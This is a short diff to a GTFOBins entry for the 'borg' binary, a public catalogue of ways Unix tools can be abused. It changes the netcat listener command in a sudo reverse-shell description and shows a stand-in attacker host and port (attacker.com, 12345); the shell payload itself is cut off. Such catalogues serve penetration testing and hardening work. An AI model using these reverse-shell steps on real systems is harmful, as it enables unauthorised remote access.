GTFOBins/GTFOBins.github.io/_gtfobins/borg.md

 ---
   sudo:
-    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+    - description: Run `nc -lvnp 12345` on the attacker box to receive the shell.
       code: |
         RHOST=attacker.com
         RPORT=12345